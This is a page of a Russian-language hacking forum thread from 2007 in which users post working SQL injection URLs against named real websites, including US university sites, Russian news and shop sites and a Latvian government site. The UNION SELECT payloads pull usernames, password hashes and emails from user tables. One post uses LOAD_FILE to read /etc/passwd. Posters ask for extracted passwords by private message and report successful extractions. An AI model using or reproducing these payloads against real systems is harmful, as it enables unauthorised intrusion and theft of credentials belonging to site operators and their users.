ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #321  
Старый 24.01.2007, 23:48
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

http://www.mmcc.ru/events.php?id=1+union+select+1,concat(user,char(58 ),password)+from+mysql.user/*

х.з почему пасс не выводится...может его нет))

http://www.mmcc.ru/events.php?id=1+union+select+1,LOAD_FILE(char(47,1 01,116,99,47,112,97,115,115,119,100))+from+mysql.u ser/*
 
Ответить с цитированием

  #322  
Старый 25.01.2007, 17:20
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

.EDU домены =)
Цитата:
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
Цитата:
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10/*
Цитата:
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+f rom+mysql.user/*
Кто докопается до паролей и тд прошу писать в ПМ
Цитата:
х.з почему пасс не выводится...может его нет))
бывает..
 
Ответить с цитированием

  #323  
Старый 25.01.2007, 19:57
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://kuda.nordiz.ru/tovar.php?tovar_id=-1%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49,50,51,52,53,54+from+phpbb_users/*
 
Ответить с цитированием

  #324  
Старый 25.01.2007, 20:15
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.ihrc.org.uk/show.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
____
 
Ответить с цитированием

  #325  
Старый 26.01.2007, 00:48
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Код HTML:
http://www.formicarium.pl/open.php?p=artykuly&dzial=-1+UNION+SELECt+database(),2/*
http://www.formicarium.pl/open.php?p=artykuly&dzial=1&art=-1+UNION+SELECt+database(),USER(),version()/*
http://www.formicarium.pl/open.php?p=artykuly+union+select+1/*
 
Ответить с цитированием

  #326  
Старый 26.01.2007, 03:59
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,2,3,4,5/*
http://www.fcdynamo.ru/material.php?id=642'+union+select+1,2,3,4,5,6,7,8/*
http://vostokmedia.com/news.details.php?id=-2+or+1=1/*
http://www.pvd.gov.lv/index.php?id=-2+or+1=1/*
http://www.mpa.ru/cis/country.php?id=-1+union+select+database(),system_user(),version()/*
http://www.keckobservatory.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
http://www.etnosfera.ru/ecentr.php?id=-2+or+1=1/*
 
Ответить с цитированием

  #327  
Старый 27.01.2007, 00:22
Аватар для Sn@k3
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...
 
Ответить с цитированием

  #328  
Старый 27.01.2007, 04:08
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

Цитата:
Сообщение от [53x]Shadow  
На islam.ru

http://www.islam.ru/shop/index.php?cat=-1+union+select+0,email,password,0,0+from+users/*

выяснил таблицу и нужные столбцы, но что то с выводом никак, у кого получится стучитесь в личку дальше больше....
http://www.islam.ru/shop/index.php?sample=771&good=98&cat=-1+union+select+1,2,3,4,concat(password,char(58),id ,CHAR(194,206,210,32,194,219,194,206,196,33))+from +users+limit+0,1/*
Без пробелов!
 
Ответить с цитированием

  #329  
Старый 27.01.2007, 04:21
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

Цитата:
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
было пять минут тока, во...
Я доделал...
http://www.dynamomania.com/comment.php?id=-1+union+select+1,2,Pwd,name,5,email,7,8+from+users +limit+0,1/*
 
Ответить с цитированием

  #330  
Старый 27.01.2007, 11:38
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
.EDU домены =)



Кто докопается до паролей и тд прошу писать в ПМ

бывает..
h..p://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,user(),6,v ersion(),password,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26%20,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42+from+mysql.user/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ